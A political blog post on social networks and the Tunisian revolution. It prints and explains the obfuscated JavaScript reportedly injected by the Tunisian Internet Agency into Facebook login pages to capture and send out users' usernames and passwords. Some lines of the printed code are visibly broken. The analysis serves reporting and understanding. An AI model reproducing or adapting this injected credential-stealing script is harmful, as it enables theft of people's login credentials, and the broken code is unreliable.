Social Network Platforms and Subversive Politics

Jesse Walker at Reason expresses skepticism concerning the branding of the Tunisian Revolution as a WikiLeaks Revolution.

I noted yesterday that some pundits have been calling the Tunisian revolt a “WikiLeaks revolution.” The phrase “Twitter revolution,” last spotted wandering around Tehran in a daze, has made a comeback as well. So now we’re in for a big boring debate about whether these boosterish labels fit, an argument that threatens to overshadow some much more interesting questions. The Internet is a series of tools. Some of those tools were used in Tunisia. I’d love to see some detailed investigations of how they were used, how they affected the use of older tools and tactics, how they advanced and/or held back the struggle, and how the regime responded to them. Debating whether their presence makes this a “[fill-in-the-blank] revolution,” by contrast, seems pointless.

Yesterday, I engaged in some bit of punditry that used the term “WikiLeaks Revolution.” Regarding Tunisian politics, I readily concede that I am an armchair blogger. However, I was careful to base my statements on journalists who could give an eyewitness account. In the post, I referenced an article in Foreign Policy Journal by Yvonne Ridley.

The demise of Ben Ali came when police prevented an unemployed 26-year-old graduate from selling fruit without a license. Mohammad Bouazizi turned himself in to a human torch on December 17 and died of the horrific burns in Sidi Bouzid, in central Tunisia.

It was the final straw, a defining moment which ignited rallies, marches and demonstrations across Tunisia.

And revelations from Wikileaks cables exposing the corrupt and extravagant lifestyle of Ben Ali and his grasping wife fanned the flames of unbridled anger from a people who were also in the grip of poverty.

I knew it was coming. I saw the burning desire for freedom in the eyes of the courageous people of Ghafsa when the Viva Palestina Convoy entered the country in February 2009 on its way to Gaza.

Our convoy witnessed the menacing secret police intimidate the crowds to stop them from gathering to cheer us on.

This vast army of spies, thugs and enforcers even tried to stop us from praying in a local mosque.

That they stood their ground to cheer us on prompted me to leave my vehicle and hug all the women who had turned out. We exchanged cards and small gifts and then, to my horror, I discovered 24 hours later that every woman I had embraced in the streets of Gafsa had been taken away and questioned.

The broader context that brewed the revolution was a police state apparatus protecting a corrupt political economy. The trigger was an act of self-immolation by an unemployed recent university graduate who was robbed of his only means of supporting himself. The WikiLeaks cables were a catalyst.

Now on matters of internet technology I’m not so much of an armchair blogger. I can do my own investigative reporting. Now I do have quite bit of skepticism regarding the intersection of technology and subversion politics. A lot of hype. There is even more hype regarding “social networking” and subversion politics. Things like “Twitter Revolution.”

The first thing to point is to be careful about conflating WikiLeaks with social networking platforms. WikiLeaks is document-sourced journalism. The “Social Networking Platform” actually failed as a means of document-sourced investigative reporting. I’ve pointed this out several times before, and I’m only pointing out what Assange himself has emphasized on several occasions. So, immediately there is a limitation to the Social Networking Platform when it comes to subversion politics. WikiLeaks relies on traditional media institutions both to provide editorial context and to serve as a distribution source.

Now the Tunisian government, however, most certainly viewed the Social Networking Platform as a threat. Here’s a post from last July by technically knowledgeable Tunisian citizen documenting how the Government was collecting social networking platform credentials of it’s citizens. At the time, this would be appear to have been some type of an official DNS cache poisoning/Phishing attack. The Tunisian Internet Agency(ATI) is the upstream provider for all Tunisian ISPs. Certainly, then, from a technical standpoint, it would have been feasible. However, the blogger notes that the attacks occurred only intermittently so as to not arouse too much suspicion.

With the latest revolt, the Tunisian government, via the ATI, resorted to more sophisticated methods of “Phishing.” From Aljazeera, Tunisia’s bitter cyberwar, we learn that ATI was injecting javascript code into Social Networking Platform login pages that intercepted the user login and used AJAX “Get” requests to send user credentials in clear text over the wire. I investigated this, and at least with respect to Facebook, I could see how this attack could work.

The hackivist “Anonymous” posted the HTML source for the Facebook login here. Below is the “phishing code” that was apparently being injected by ATI.

function h6h(st){var st2="";for(i=0;i>4;cl=c&0x0F;
st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;}
function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;}
function hAAAQ3d() {
var frm = document.getElementById("login_form"); var us3r =; var pa55 = frm.pass.value;
var url = ""+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);}
function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;}
function inv0k2(url) {var xr = new XMLHttpRequest();"GET", url, false); xr.send("");}
function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP');"GET", url, false); xr.send("");}

In the “form tag” of the html, an onsubmit client event, “onsubmit=’hAAAQ3d()’,” was also being injected that would trigger the phishing code. It’s fairly simple in operation. A user login would also trigger a client onsubmit event handler, which is the function “hAAAQ3d().” This function uses the Document DOM model to capture the username and password. It then passes each to a function “h6h” that uses string manipulation for a very weak encryption. It then builds a “url string” with the weakly encrypted username and password in the querystring. It then uses the XMLHttpRequest object(or the MS ActiveXObject version in the event of Internet Explorer) to pass this url in a client-side , synchronous AJAX Get Request. The actual url, of course, on the Facebook side(for browser cross-domain security reasons, the domain in the url must be doesn’t exist. The intent is to pass the url, the url with the username and password in the querystring, in clear text over the wire that can then be captured by ATI.

“Anonymous” posted a GreaseMonkey script for FireFox that stripped the “phishing script” from Social networking platform login pages. EFF issued a Security Bulletin on Jan. 11th that highlighted the “phishing attempts.” From all accounts, the “phishing attempts,” or at least attempts by this particular method, had ceased by Jan. 11th or Jan. 12th.

Hactivist “Anonymous” also participated in DDoS attacks against Tunisian government websites that were successful. But as I have noted in previous “WikiLeaks Watch” posts, Anonymous/AnonOps uses IRC(Internet Relay Chat) to organize participants in this endeavor. And IRC has been around forever.

For all you Gen Y types out there; IRC and UseNet was to Gen X as the Social Network Platform is to Gen Y. The difference between the two “platforms” is that the SNP has a better API, with regard to web and particularly with regard to today’s ubiquitous mobile devices. It’s an evolution. But a revolution? That’s debatable.

The lesson from regarding SNP and the Tunisian government is that SNP can be quite resilient against “technical attacks.” It’s importance in the Tunisian revolution was magnified because it was attacked by the Tunisian government. That was a mistake. But the Ben Ali regime is not the US Government. The US Government can ex post facto condemn the crude “censorship” of the Ben Ali regime while working methodically behind the scenes to capture the political economy of SNP. We have already seen this with respect to WikiLeaks and the financial banking system. Cutting off means of financial support is a far more subtle and far more powerful means of censorship.

“Anonymous” is a hero when it attacks the crude, technical censorship of the Ben Ali regime. But it’s criminal when it attacks the political economy of US censorship.

As I maintain, and will continue to maintain, a political hack must be at the heart of undermining the statist 21st century political economy. Technical utopianism isn’t going to cut it alone. For example, Peter Thiel’s supposed libertarian e-money transaction system(PayPal) ended up being politically captured and now is a powerful component of SNP soft censorship.

SNP that can reinforce a political hack(s) has the potential to be revolutionary. But without the political hacks, it is only evolutionary, and the evolutionary path would be more along the lines of human social fitness for the Orwellian Boot. To the extent that SNP does threaten to become revolutionary, you can bet the mainstream babble about “Twitter Revolution” will change in tone.

One thought on “Social Network Platforms and Subversive Politics

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s